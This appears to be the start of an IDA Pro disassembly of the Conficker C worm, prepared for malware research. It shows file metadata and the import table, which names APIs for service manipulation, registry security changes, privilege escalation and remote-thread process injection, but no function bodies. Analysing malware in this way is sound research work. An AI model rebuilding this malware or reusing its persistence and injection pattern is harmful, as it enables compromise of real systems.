;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 81D1749BBFFBC8768E57D578696F33B0
; File Name : /space/hassen/conficker_C.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 9A0000
; Section 1. (virtual address 00001000)
; Virtual size : 00021000 ( 135168.)
; Section size in file : 0002036E ( 131950.)
; Offset to raw data for section: 00000200
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
;
; Imports from advapi32.dll
;
; OS type : MS Windows
; Application type: DLL 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Externs
; _idata
; LSTATUS __stdcall RegOpenKeyExW(HKEY hKey,LPCWSTR lpSubKey,DWORD ulOptions,REGSAM samDesired,PHKEY phkResult)
extrn RegOpenKeyExW:dword ; CODE XREF: sub_9AE496+3C�p
; sub_9AE520+36�p
; DATA XREF: ...
; LSTATUS __stdcall RegSetKeySecurity(HKEY hKey,SECURITY_INFORMATION SecurityInformation,PSECURITY_DESCRIPTOR pSecurityDescriptor)
extrn RegSetKeySecurity:dword ; CODE XREF: sub_9AE3A4+A7�p
; DATA XREF: sub_9AE3A4+A7�r
; SC_HANDLE __stdcall OpenSCManagerW(LPCWSTR lpMachineName,LPCWSTR lpDatabaseName,DWORD dwDesiredAccess)
extrn OpenSCManagerW:dword ; CODE XREF: sub_9AE195+3E�p
; DATA XREF: sub_9AE195+3E�r
; BOOL __stdcall EnumServicesStatusW(SC_HANDLE hSCManager,DWORD dwServiceType,DWORD dwServiceState,LPENUM_SERVICE_STATUSW lpServices,DWORD cbBufSize,LPDWORD pcbBytesNeeded,LPDWORD lpServicesReturned,LPDWORD lpResumeHandle)
extrn EnumServicesStatusW:dword ; CODE XREF: sub_9AE195+7A�p
; DATA XREF: sub_9AE195+7A�r
; SC_HANDLE __stdcall OpenServiceW(SC_HANDLE hSCManager,LPCWSTR lpServiceName,DWORD dwDesiredAccess)
extrn OpenServiceW:dword ; CODE XREF: sub_9AE195+FD�p
; DATA XREF: sub_9AE195+FD�r
; BOOL __stdcall QueryServiceConfigW(SC_HANDLE hService,LPQUERY_SERVICE_CONFIGW lpServiceConfig,DWORD cbBufSize,LPDWORD pcbBytesNeeded)
extrn QueryServiceConfigW:dword ; CODE XREF: sub_9AE195+11D�p
; DATA XREF: sub_9AE195+11D�r
; BOOL __stdcall QueryServiceConfig2W(SC_HANDLE hService,DWORD dwInfoLevel,LPBYTE lpBuffer,DWORD cbBufSize,LPDWORD pcbBytesNeeded)
extrn QueryServiceConfig2W:dword ; CODE XREF: sub_9AE195+143�p
; DATA XREF: sub_9AE195+143�r
; BOOL __stdcall ImpersonateLoggedOnUser(HANDLE hToken)
extrn ImpersonateLoggedOnUser:dword ; CODE XREF: sub_9AD417+45�p
; DATA XREF: sub_9AD417+45�r
; BOOL __stdcall InitializeSecurityDescriptor(PSECURITY_DESCRIPTOR pSecurityDescriptor,DWORD dwRevision)
extrn InitializeSecurityDescriptor:dword ; CODE XREF: sub_9AD15E+4E�p
; sub_9AE3A4+8A�p
; DATA XREF: ...
; DWORD __stdcall GetLengthSid(PSID pSid)
extrn GetLengthSid:dword ; CODE XREF: sub_9AD15E+6F�p
; sub_9AE3A4+49�p
; DATA XREF: ...
; BOOL __stdcall InitializeAcl(PACL pAcl,DWORD nAclLength,DWORD dwAclRevision)
extrn InitializeAcl:dword ; CODE XREF: sub_9AD15E+9A�p
; sub_9AE3A4+6D�p
; DATA XREF: ...
; BOOL __stdcall AddAccessAllowedAce(PACL pAcl,DWORD dwAceRevision,DWORD AccessMask,PSID pSid)
extrn AddAccessAllowedAce:dword ; CODE XREF: sub_9AD15E+A9�p
; sub_9AE3A4+7E�p
; DATA XREF: ...
; BOOL __stdcall SetSecurityDescriptorDacl(PSECURITY_DESCRIPTOR pSecurityDescriptor,BOOL bDaclPresent,PACL pDacl,BOOL bDaclDefaulted)
extrn SetSecurityDescriptorDacl:dword ; CODE XREF: sub_9AD15E+B9�p
; sub_9AE3A4+98�p
; DATA XREF: ...
; BOOL __stdcall SetFileSecurityA(LPCSTR lpFileName,SECURITY_INFORMATION SecurityInformation,PSECURITY_DESCRIPTOR pSecurityDescriptor)
extrn SetFileSecurityA:dword ; CODE XREF: sub_9AD15E+C8�p
; DATA XREF: sub_9AD15E+C8�r
; BOOL __stdcall LookupPrivilegeValueA(LPCSTR lpSystemName,LPCSTR lpName,PLUID lpLuid)
extrn LookupPrivilegeValueA:dword ; CODE XREF: sub_9AC5D7+3C�p
; DATA XREF: sub_9AC5D7+3C�r
; BOOL __stdcall AdjustTokenPrivileges(HANDLE TokenHandle,BOOL DisableAllPrivileges,PTOKEN_PRIVILEGES NewState,DWORD BufferLength,PTOKEN_PRIVILEGES PreviousState,PDWORD ReturnLength)
extrn AdjustTokenPrivileges:dword ; CODE XREF: sub_9AC5D7+52�p
; DATA XREF: sub_9AC5D7+52�r
; BOOL __stdcall ChangeServiceConfigA(SC_HANDLE hService,DWORD dwServiceType,DWORD dwStartType,DWORD dwErrorControl,LPCSTR lpBinaryPathName,LPCSTR lpLoadOrderGroup,LPDWORD lpdwTagId,LPCSTR lpDependencies,LPCSTR lpServiceStartName,LPCSTR lpPassword,LPCSTR lpDisplayName)
extrn ChangeServiceConfigA:dword ; CODE XREF: sub_9AC553+69�p
; DATA XREF: sub_9AC553+69�r
; BOOL __stdcall RevertToSelf()
extrn RevertToSelf:dword ; CODE XREF: sub_9A99AE+1F�p
; DATA XREF: sub_9A99AE+1F�r
; LSTATUS __stdcall RegSetValueExA(HKEY hKey,LPCSTR lpValueName,DWORD Reserved,DWORD dwType,const BYTE *lpData,DWORD cbData)
extrn RegSetValueExA:dword ; CODE XREF: sub_9A8419+30�p
; sub_9AD05F+31�p ...
; LSTATUS __stdcall RegOpenKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD ulOptions,REGSAM samDesired,PHKEY phkResult)
extrn RegOpenKeyExA:dword ; CODE XREF: sub_9A8396+1B�p
; sub_9A8419+17�p ...
; LSTATUS __stdcall RegQueryValueExA(HKEY hKey,LPCSTR lpValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData)
extrn RegQueryValueExA:dword ; CODE XREF: sub_9A8396+36�p
; sub_9A8396+59�p ...
; LSTATUS __stdcall RegCloseKey(HKEY hKey)
extrn RegCloseKey:dword ; CODE XREF: sub_9A8396+76�p
; sub_9A8419+3E�p ...
; SC_HANDLE __stdcall CreateServiceA(SC_HANDLE hSCManager,LPCSTR lpServiceName,LPCSTR lpDisplayName,DWORD dwDesiredAccess,DWORD dwServiceType,DWORD dwStartType,DWORD dwErrorControl,LPCSTR lpBinaryPathName,LPCSTR lpLoadOrderGroup,LPDWORD lpdwTagId,LPCSTR lpDependencies,LPCSTR lpServiceStartName,LPCSTR lpPassword)
extrn CreateServiceA:dword ; CODE XREF: sub_9A7F37+3A�p
; DATA XREF: sub_9A7F37+3A�r
; BOOL __stdcall StartServiceA(SC_HANDLE hService,DWORD dwNumServiceArgs,LPCSTR *lpServiceArgVectors)
extrn StartServiceA:dword ; CODE XREF: sub_9A7F37+4F�p
; DATA XREF: sub_9A7F37+4F�r
; SC_HANDLE __stdcall OpenSCManagerA(LPCSTR lpMachineName,LPCSTR lpDatabaseName,DWORD dwDesiredAccess)
extrn OpenSCManagerA:dword ; CODE XREF: sub_9A7ED6+14�p
; sub_9A7F37+E�p ...
; SC_HANDLE __stdcall OpenServiceA(SC_HANDLE hSCManager,LPCSTR lpServiceName,DWORD dwDesiredAccess)
extrn OpenServiceA:dword ; CODE XREF: sub_9A7ED6+2A�p
; sub_9AC553+2A�p
; DATA XREF: ...
; BOOL __stdcall CloseServiceHandle(SC_HANDLE hSCObject)
extrn CloseServiceHandle:dword ; CODE XREF: sub_9A7ED6+54�p
; sub_9A7ED6+57�p ...
; BOOL __stdcall ControlService(SC_HANDLE hService,DWORD dwControl,LPSERVICE_STATUS lpServiceStatus)
extrn ControlService:dword ; CODE XREF: sub_9A7ED6+43�p
; sub_9AC553+44�p
; DATA XREF: ...
; BOOL __stdcall DeleteService(SC_HANDLE hService)
extrn DeleteService:dword ; CODE XREF: sub_9A7ED6+4D�p
; DATA XREF: sub_9A7ED6+4D�r
; BOOL __stdcall OpenProcessToken(HANDLE ProcessHandle,DWORD DesiredAccess,PHANDLE TokenHandle)
extrn OpenProcessToken:dword ; CODE XREF: sub_9A72CA+19�p
; sub_9AC5D7+16�p ...
; BOOL __stdcall GetTokenInformation(HANDLE TokenHandle,TOKEN_INFORMATION_CLASS TokenInformationClass,LPVOID TokenInformation,DWORD TokenInformationLength,PDWORD ReturnLength)
extrn GetTokenInformation:dword ; CODE XREF: sub_9A72CA+39�p
; sub_9A72CA+75�p
; DATA XREF: ...
; BOOL __stdcall AllocateAndInitializeSid(PSID_IDENTIFIER_AUTHORITY pIdentifierAuthority,BYTE nSubAuthorityCount,DWORD nSubAuthority0,DWORD nSubAuthority1,DWORD nSubAuthority2,DWORD nSubAuthority3,DWORD nSubAuthority4,DWORD nSubAuthority5,DWORD nSubAuthority6,DWORD nSubAuthority7,PSID *pSid)
extrn AllocateAndInitializeSid:dword ; CODE XREF: sub_9A72CA+B1�p
; sub_9A72CA+C6�p ...
; BOOL __stdcall EqualSid(PSID pSid1,PSID pSid2)
extrn EqualSid:dword ; CODE XREF: sub_9A72CA+E8�p
; sub_9A72CA+F8�p
; DATA XREF: ...
; PVOID __stdcall FreeSid(PSID pSid)
extrn FreeSid:dword ; CODE XREF: sub_9A72CA+122�p
; sub_9A72CA+12C�p ...
; LSTATUS __stdcall RegEnumKeyExW(HKEY hKey,DWORD dwIndex,LPWSTR lpName,LPDWORD lpcchName,LPDWORD lpReserved,LPWSTR lpClass,LPDWORD lpcchClass,PFILETIME lpftLastWriteTime)
extrn RegEnumKeyExW:dword ; CODE XREF: sub_9AE496+77�p
; DATA XREF: sub_9AE496+B�r
; LSTATUS __stdcall RegSetValueExW(HKEY hKey,LPCWSTR lpValueName,DWORD Reserved,DWORD dwType,const BYTE *lpData,DWORD cbData)
extrn RegSetValueExW:dword ; CODE XREF: sub_9AE520+F8�p
; sub_9AE641+F2�p ...
; LSTATUS __stdcall RegQueryValueExW(HKEY hKey,LPCWSTR lpValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData)
extrn RegQueryValueExW:dword ; CODE XREF: sub_9AE520+6B�p
; sub_9AE520+B5�p
; DATA XREF: ...
; LSTATUS __stdcall RegFlushKey(HKEY hKey)
extrn RegFlushKey:dword ; CODE XREF: sub_9AE641+1DF�p
; DATA XREF: sub_9AE641+1DF�r
; LSTATUS __stdcall RegCreateKeyExW(HKEY hKey,LPCWSTR lpSubKey,DWORD Reserved,LPWSTR lpClass,DWORD dwOptions,REGSAM samDesired,const LPSECURITY_ATTRIBUTES lpSecurityAttributes,PHKEY phkResult,LPDWORD lpdwDisposition)
extrn RegCreateKeyExW:dword ; CODE XREF: sub_9AE641+C5�p
; sub_9AE641+19E�p
; DATA XREF: ...
; LSTATUS __stdcall RegCreateKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD Reserved,LPSTR lpClass,DWORD dwOptions,REGSAM samDesired,const LPSECURITY_ATTRIBUTES lpSecurityAttributes,PHKEY phkResult,LPDWORD lpdwDisposition)
extrn RegCreateKeyExA:dword ; CODE XREF: sub_9AE850+1A2�p
; DATA XREF: sub_9AE850+1A2�r
;
; Imports from kernel32.dll
;
extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind�r
; DWORD __stdcall WaitForMultipleObjects(DWORD nCount,const HANDLE *lpHandles,BOOL bWaitAll,DWORD dwMilliseconds)
extrn WaitForMultipleObjects:dword ; CODE XREF: sub_9AEECE+190�p
; DATA XREF: sub_9AEECE+190�r
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_9AE140+49�p
; DATA XREF: sub_9AE140+49�r
; HANDLE __stdcall OpenEventA(DWORD dwDesiredAccess,BOOL bInheritHandle,LPCSTR lpName)
extrn OpenEventA:dword ; CODE XREF: sub_9ADBF1+454�p
; sub_9ADBF1+4CE�p
; DATA XREF: ...
; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
extrn GetVersionExA:dword ; CODE XREF: sub_9A7170+2A�p
; sub_9A7CBF+49�p ...
; UINT __stdcall GetSystemDirectoryA(LPSTR lpBuffer,UINT uSize)
extrn GetSystemDirectoryA:dword ; CODE XREF: sub_9A722A+44�p
; sub_9A7670+5E�p ...
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_9A72CA+139�p
; StartAddress+72�p ...
; HGLOBAL __stdcall GlobalFree(HGLOBAL hMem)
extrn GlobalFree:dword ; CODE XREF: sub_9A72CA+12F�p
; sub_9A752A+EC�p ...
; HGLOBAL __stdcall GlobalAlloc(UINT uFlags,SIZE_T dwBytes)
extrn GlobalAlloc:dword ; CODE XREF: sub_9A72CA+58�p
; sub_9A8396+40�p ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_9A72CA+43�p
; sub_9A798D+F0�p ...
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: sub_9A72CA+12�p
; sub_9AC5D7+F�p
; DATA XREF: ...
; int __stdcall WideCharToMultiByte(UINT CodePage,DWORD dwFlags,LPCWSTR lpWideCharStr,int cchWideChar,LPSTR lpMultiByteStr,int cbMultiByte,LPCSTR lpDefaultChar,LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword ; CODE XREF: sub_9A7410+50�p
; sub_9A9318+42�p ...
; DWORD __stdcall GetVersion()
extrn GetVersion:dword ; CODE XREF: sub_9A752A+127�p
; StartAddress+4C�p ...
; BOOL __stdcall MoveFileExA(LPCSTR lpExistingFileName,LPCSTR lpNewFileName,DWORD dwFlags)
extrn MoveFileExA:dword ; CODE XREF: sub_9A752A+E3�p
; sub_9A7670+31�p ...
; BOOL __stdcall MoveFileA(LPCSTR lpExistingFileName,LPCSTR lpNewFileName)
extrn MoveFileA:dword ; CODE XREF: sub_9A752A+89�p
; DATA XREF: sub_9A752A+89�r
; DWORD __stdcall GetTempPathA(DWORD nBufferLength,LPSTR lpBuffer)
extrn GetTempPathA:dword ; CODE XREF: sub_9A7670+FD�p
; sub_9A7F9D+70�p ...
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: sub_9A7670+49�p
; StartAddress+41�p ...
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn DeleteFileA:dword ; CODE XREF: sub_9A7670+3E�p
; sub_9A7F9D+119�p ...
; BOOL __stdcall LockFile(HANDLE hFile,DWORD dwFileOffsetLow,DWORD dwFileOffsetHigh,DWORD nNumberOfBytesToLockLow,DWORD nNumberOfBytesToLockHigh)
extrn LockFile:dword ; CODE XREF: StartAddress+13D�p
; DATA XREF: StartAddress+13D�r
; DWORD __stdcall GetFileSize(HANDLE hFile,LPDWORD lpFileSizeHigh)
extrn GetFileSize:dword ; CODE XREF: StartAddress+133�p
; sub_9AC769+2D�p
; DATA XREF: ...
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName,DWORD dwDesiredAccess,DWORD dwShareMode,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD dwCreationDisposition,DWORD dwFlagsAndAttributes,HANDLE hTemplateFile)
extrn CreateFileA:dword ; CODE XREF: StartAddress+111�p
; StartAddress+125�p ...
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes,SIZE_T dwStackSize,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,DWORD dwCreationFlags,LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: StartAddress+6B�p
; sub_9A798D+206�p ...
; UINT __stdcall SetErrorMode(UINT uMode)
extrn SetErrorMode:dword ; CODE XREF: StartAddress+F�p
; DATA XREF: StartAddress+F�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: sub_9A798D+196�p
; DATA XREF: sub_9A798D+196�r
; HANDLE __stdcall OpenMutexA(DWORD dwDesiredAccess,BOOL bInheritHandle,LPCSTR lpName)
extrn OpenMutexA:dword ; CODE XREF: sub_9A798D+15B�p
; DATA XREF: sub_9A798D+15B�r
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: sub_9A798D+F9�p
; DATA XREF: sub_9A798D+F9�r
; HANDLE __stdcall CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes,BOOL bInitialOwner,LPCSTR lpName)
extrn CreateMutexA:dword ; CODE XREF: sub_9A798D+E5�p
; DllMain(x,x,x)+5D�p
; DATA XREF: ...
; BOOL __stdcall GetComputerNameA(LPSTR lpBuffer,LPDWORD nSize)
extrn GetComputerNameA:dword ; CODE XREF: sub_9A798D+69�p
; sub_9A8D3E+1B�p ...
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule,LPCH lpFilename,DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: sub_9A798D+3C�p
; sub_9AC6A4+24�p ...
; DWORD __stdcall GetCurrentProcessId()
extrn GetCurrentProcessId:dword ; CODE XREF: DllMain(x,x,x)+2C�p
; sub_9AB07D+17�p ...
; BOOL __stdcall DisableThreadLibraryCalls(HMODULE hLibModule)
extrn DisableThreadLibraryCalls:dword ; CODE XREF: DllMain(x,x,x)+22�p
; DATA XREF: DllMain(x,x,x)+22�r
; BOOL __stdcall DeviceIoControl(HANDLE hDevice,DWORD dwIoControlCode,LPVOID lpInBuffer,DWORD nInBufferSize,LPVOID lpOutBuffer,DWORD nOutBufferSize,LPDWORD lpBytesReturned,LPOVERLAPPED lpOverlapped)
extrn DeviceIoControl:dword ; CODE XREF: sub_9A7F9D+14F�p
; DATA XREF: sub_9A7F9D+14F�r
; BOOL __stdcall WriteFile(HANDLE hFile,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: sub_9A7F9D+DE�p
; sub_9A8D7E+5F�p ...
; UINT __stdcall GetTempFileNameA(LPCSTR lpPathName,LPCSTR lpPrefixString,UINT uUnique,LPSTR lpTempFileName)
extrn GetTempFileNameA:dword ; CODE XREF: sub_9A7F9D+5E�p
; sub_9A7F9D+8C�p ...
; BOOL __stdcall VirtualFree(LPVOID lpAddress,SIZE_T dwSize,DWORD dwFreeType)
extrn VirtualFree:dword ; CODE XREF: sub_9A81B2+1D2�p
; sub_9AB408+69�p
; DATA XREF: ...
; FARPROC __stdcall GetProcAddress(HMODULE hModule,LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_9A81B2+18A�p
; sub_9AB408+25�p ...
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_9A81B2+14C�p
; sub_9AB408+16�p ...
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress,SIZE_T dwSize,DWORD flAllocationType,DWORD flProtect)
extrn VirtualAlloc:dword ; CODE XREF: sub_9A81B2+4A�p
; sub_9AB408+3C�p
; DATA XREF: ...
; BOOL __stdcall SystemTimeToFileTime(const SYSTEMTIME *lpSystemTime,LPFILETIME lpFileTime)
extrn SystemTimeToFileTime:dword ; CODE XREF: sub_9A8606+17�p
; sub_9AEC85+91�p
; DATA XREF: ...
; void __stdcall GetSystemTime(LPSYSTEMTIME lpSystemTime)
extrn GetSystemTime:dword ; CODE XREF: sub_9A8606+A�p
; sub_9AEC85+6F�p ...
; void __stdcall LeaveCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn LeaveCriticalSection:dword ; CODE XREF: sub_9A8AD0+60�p
; sub_9A8BC6+24�p ...
; void __stdcall EnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn EnterCriticalSection:dword ; CODE XREF: sub_9A8AD0+1C�p
; sub_9A8BC6+F�p ...
; void __stdcall InitializeCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn InitializeCriticalSection:dword ; CODE XREF: sub_9A8B47+19�p
; sub_9A8B47+1F�p
; DATA XREF: ...
; BOOL __stdcall ReadFile(HANDLE hFile,LPVOID lpBuffer,DWORD nNumberOfBytesToRead,LPDWORD lpNumberOfBytesRead,LPOVERLAPPED lpOverlapped)
extrn ReadFile:dword ; CODE XREF: sub_9A90F2+63�p
; sub_9AC769+51�p
; DATA XREF: ...
; BOOL __stdcall ConnectNamedPipe(HANDLE hNamedPipe,LPOVERLAPPED lpOverlapped)
extrn ConnectNamedPipe:dword ; CODE XREF: sub_9A90F2+36�p
; DATA XREF: sub_9A90F2+36�r
; HANDLE __stdcall CreateNamedPipeA(LPCSTR lpName,DWORD dwOpenMode,DWORD dwPipeMode,DWORD nMaxInstances,DWORD nOutBufferSize,DWORD nInBufferSize,DWORD nDefaultTimeOut,LPSECURITY_ATTRIBUTES lpSecurityAttributes)
extrn CreateNamedPipeA:dword ; CODE XREF: sub_9A90F2+A2�p
; DATA XREF: sub_9A90F2+1D�r
; BOOL __stdcall DeleteFileW(LPCWSTR lpFileName)
extrn DeleteFileW:dword ; CODE XREF: sub_9A9318+2C8�p
; DATA XREF: sub_9A9318+2C8�r
; void __stdcall GetLocalTime(LPSYSTEMTIME lpSystemTime)
extrn GetLocalTime:dword ; CODE XREF: sub_9A9318+267�p
; DATA XREF: sub_9A9318+267�r
; HANDLE __stdcall CreateFileW(LPCWSTR lpFileName,DWORD dwDesiredAccess,DWORD dwShareMode,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD dwCreationDisposition,DWORD dwFlagsAndAttributes,HANDLE hTemplateFile)
extrn CreateFileW:dword ; CODE XREF: sub_9A9318+17A�p
; DATA XREF: sub_9A9318+17A�r
; BOOL __stdcall FindClose(HANDLE hFindFile)
extrn FindClose:dword ; CODE XREF: sub_9A9318+14C�p
; sub_9ABB9F+1F7�p ...
; HANDLE __stdcall FindFirstFileW(LPCWSTR lpFileName,LPWIN32_FIND_DATAW lpFindFileData)
extrn FindFirstFileW:dword ; CODE XREF: sub_9A9318+140�p
; DATA XREF: sub_9A9318+140�r
; int __stdcall MultiByteToWideChar(UINT CodePage,DWORD dwFlags,LPCSTR lpMultiByteStr,int cbMultiByte,LPWSTR lpWideCharStr,int cchWideChar)
extrn MultiByteToWideChar:dword ; CODE XREF: sub_9A96FE+13A�p
; sub_9AAE90+34�p ...
; BOOL __stdcall GetComputerNameW(LPWSTR lpBuffer,LPDWORD nSize)
extrn GetComputerNameW:dword ; CODE XREF: sub_9A993B+5A�p
; DATA XREF: sub_9A993B+5A�r
; BOOL __stdcall TerminateThread(HANDLE hThread,DWORD dwExitCode)
extrn TerminateThread:dword ; CODE XREF: sub_9A9A64+149�p
; sub_9A9CA1+74�p ...
; DWORD __stdcall GetCurrentThreadId()
extrn GetCurrentThreadId:dword ; CODE XREF: sub_9A9A64+120�p
; sub_9AC50B+7�p
; DATA XREF: ...
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle,DWORD dwMilliseconds)
extrn WaitForSingleObject:dword ; CODE XREF: sub_9A9CA1+65�p
; sub_9AD6D4+5C�p ...
; void __stdcall SetLastError(DWORD dwErrCode)
extrn SetLastError:dword ; CODE XREF: sub_9AAD64+24�p
; sub_9AAE58+29�p ...
; BOOL __stdcall Module32Next(HANDLE hSnapshot,LPMODULEENTRY32 lpme)
extrn __imp_Module32Next:dword ; DATA XREF: Module32Next�r
; BOOL __stdcall Module32First(HANDLE hSnapshot,LPMODULEENTRY32 lpme)
extrn __imp_Module32First:dword ; DATA XREF: Module32First�r
; HANDLE __stdcall CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID)
extrn __imp_CreateToolhelp32Snapshot:dword
; DATA XREF: CreateToolhelp32Snapshot�r
; BOOL __stdcall SetThreadPriority(HANDLE hThread,int nPriority)
extrn SetThreadPriority:dword ; CODE XREF: sub_9AB2C9+ED�p
; sub_9AB2C9+106�p ...
; BOOL __stdcall VirtualProtect(LPVOID lpAddress,SIZE_T dwSize,DWORD flNewProtect,PDWORD lpflOldProtect)
extrn VirtualProtect:dword ; CODE XREF: sub_9AB2C9+CF�p
; sub_9AB2C9+114�p
; DATA XREF: ...
; int __stdcall GetThreadPriority(HANDLE hThread)
extrn GetThreadPriority:dword ; CODE XREF: sub_9AB2C9+1F�p
; DATA XREF: sub_9AB2C9+1F�r
; HANDLE __stdcall GetCurrentThread()
extrn GetCurrentThread:dword ; CODE XREF: sub_9AB2C9+15�p
; DATA XREF: sub_9AB2C9+15�r
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: sub_9AB408+9�p
; sub_9AB535+5�p ...
; BOOL __stdcall CreateDirectoryA(LPCSTR lpPathName,LPSECURITY_ATTRIBUTES lpSecurityAttributes)
extrn CreateDirectoryA:dword ; CODE XREF: sub_9ABB9F+250�p
; sub_9ABB9F+2AF�p
; DATA XREF: ...
; HANDLE __stdcall FindFirstFileA(LPCSTR lpFileName,LPWIN32_FIND_DATAA lpFindFileData)
extrn FindFirstFileA:dword ; CODE XREF: sub_9ABB9F+1E8�p
; sub_9ABB9F+369�p
; DATA XREF: ...
; BOOL __stdcall GetVolumeInformationA(LPCSTR lpRootPathName,LPSTR lpVolumeNameBuffer,DWORD nVolumeNameSize,LPDWORD lpVolumeSerialNumber,LPDWORD lpMaximumComponentLength,LPDWORD lpFileSystemFlags,LPSTR lpFileSystemNameBuffer,DWORD nFileSystemNameSize)
extrn GetVolumeInformationA:dword ; CODE XREF: sub_9ABB9F+32�p
; sub_9AC33E+3B�p
; DATA XREF: ...
; UINT __stdcall GetDriveTypeA(LPCSTR lpRootPathName)
extrn GetDriveTypeA:dword ; CODE XREF: sub_9ABFD3+47�p
; sub_9AC151+48�p
; DATA XREF: ...
; DWORD __stdcall GetLogicalDrives()
extrn GetLogicalDrives:dword ; CODE XREF: sub_9AC151+17�p
; DATA XREF: sub_9AC151+17�r
; DWORD __stdcall GetTickCount()
extrn GetTickCount:dword ; CODE XREF: sub_9AC50B:loc_9AC53A�p
; sub_9AD58F+4F�p ...
; BOOL __stdcall QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount)
extrn QueryPerformanceCounter:dword ; CODE XREF: sub_9AC50B+1B�p
; DATA XREF: sub_9AC50B+1B�r
; BOOL __stdcall SetFileTime(HANDLE hFile,const FILETIME *lpCreationTime,const FILETIME *lpLastAccessTime,const FILETIME *lpLastWriteTime)
extrn SetFileTime:dword ; CODE XREF: sub_9AC6A4+8F�p
; DATA XREF: sub_9AC6A4+8F�r
; BOOL __stdcall GetFileTime(HANDLE hFile,LPFILETIME lpCreationTime,LPFILETIME lpLastAccessTime,LPFILETIME lpLastWriteTime)
extrn GetFileTime:dword ; CODE XREF: sub_9AC6A4+5B�p
; DATA XREF: sub_9AC6A4+5B�r
; LPVOID __stdcall HeapAlloc(HANDLE hHeap,DWORD dwFlags,SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: sub_9AC741+D�p
; DATA XREF: sub_9AC741+D�r
; HANDLE __stdcall GetProcessHeap()
extrn GetProcessHeap:dword ; CODE XREF: sub_9AC741+6�p
; sub_9AC755+6�p
; DATA XREF: ...
; BOOL __stdcall HeapFree(HANDLE hHeap,DWORD dwFlags,LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: sub_9AC755+D�p
; DATA XREF: sub_9AC755+D�r
; BOOL __stdcall Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)
extrn __imp_Process32Next:dword ; DATA XREF: Process32Next�r
; BOOL __stdcall Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)
extrn __imp_Process32First:dword ; DATA XREF: Process32First�r
; BOOL __stdcall Thread32Next(HANDLE hSnapshot,LPTHREADENTRY32 lpte)
extrn __imp_Thread32Next:dword ; DATA XREF: Thread32Next�r
; HANDLE __stdcall OpenThread(DWORD dwDesiredAccess,BOOL bInheritHandle,DWORD dwThreadId)
extrn OpenThread:dword ; CODE XREF: sub_9ACC9F+123�p
; DATA XREF: sub_9ACC9F+123�r
; BOOL __stdcall Thread32First(HANDLE hSnapshot,LPTHREADENTRY32 lpte)
extrn __imp_Thread32First:dword ; DATA XREF: Thread32First�r
; HANDLE __stdcall CreateRemoteThread(HANDLE hProcess,LPSECURITY_ATTRIBUTES lpThreadAttributes,SIZE_T dwStackSize,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,DWORD dwCreationFlags,LPDWORD lpThreadId)
extrn CreateRemoteThread:dword ; CODE XREF: sub_9ACC9F+9C�p
; DATA XREF: sub_9ACC9F+9C�r
; BOOL __stdcall WriteProcessMemory(HANDLE hProcess,LPVOID lpBaseAddress,LPCVOID lpBuffer,SIZE_T nSize,SIZE_T *lpNumberOfBytesWritten)
extrn WriteProcessMemory:dword ; CODE XREF: sub_9ACC9F+7C�p
; DATA XREF: sub_9ACC9F+7C�r
